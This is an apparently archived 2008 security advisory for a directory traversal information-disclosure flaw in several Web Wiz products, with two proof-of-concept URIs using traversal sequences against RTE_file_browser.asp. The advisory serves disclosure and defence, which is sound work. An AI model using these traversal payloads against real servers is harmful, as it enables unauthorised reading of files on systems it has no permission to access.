exploits , vulnerabilities , articles , Multiple Web Wiz Products Remote Information Disclosure Vulnerability

Title	Multiple Web Wiz Products Remote Information Disclosure Vulnerability
Published	2008-01-23-12:00AM
Updated	2008-01-24-05:38PM
Class	Input Validation Error
CVE
Remote	Yes
Local	No
Credit	The AmnPardaz Security Research Team is credited with the discovery of this vulnerability.
Vulnerable	Web Wiz Rich Text Editor 4.0 Web Wiz NewPad 1.02 Web Wiz Forums 9.07
Not Vulnerable
Code	Attackers can exploit this issue via a browser.The following proof-of-concept URIs are available:http://www.example.com/RTE_file_browser.asp?look=&sub=\.....\\\.....\\\.....\\http://www.example.com/RTE_file_browser.asp?look=save&sub=\.....\\\.....\\\.....\\\.....\\\.....\\\
TXT

Vulnerabilities - newest 10 RSS | More

• 2009-12-09 Adobe Flash Player and AIR Data Injection Remote Code Execution Vulnerability
• 2009-12-09 Adobe Flash Player ActiveX Control Information Disclosure Vulnerability
• 2009-12-09 Adobe Flash Player and AIR Multiple Unspecified Remote Code Execution Vulnerabilities
• 2009-12-09 HP OpenView Network Node Manager Multiple Remote Code Execution Vulnerabilities
• 2009-12-09 Shibboleth Redirection URL HTML Injection Vulnerability
• 2009-12-09 VLC Media Player RTSP Remote Buffer Overflow Vulnerability
• 2009-12-09 Polipo Malformed HTTP GET Request Memory Corruption Vulnerability
• 2009-12-09 PhpShop Cross-Site Scripting and SQL Injection Vulnerabilities
• 2009-12-09 GNU GRUB Local Authentication Bypass Vulnerability
• 2009-12-09 NTP mode 7 MODE_PRIVATE Packet Remote Denial of Service Vulnerability

• Vulnerabilities
• Exploits
• News
• Articles

Copyright 2007, SecurityDot
Thu, 10 Dec 2009 08:53:50 +0000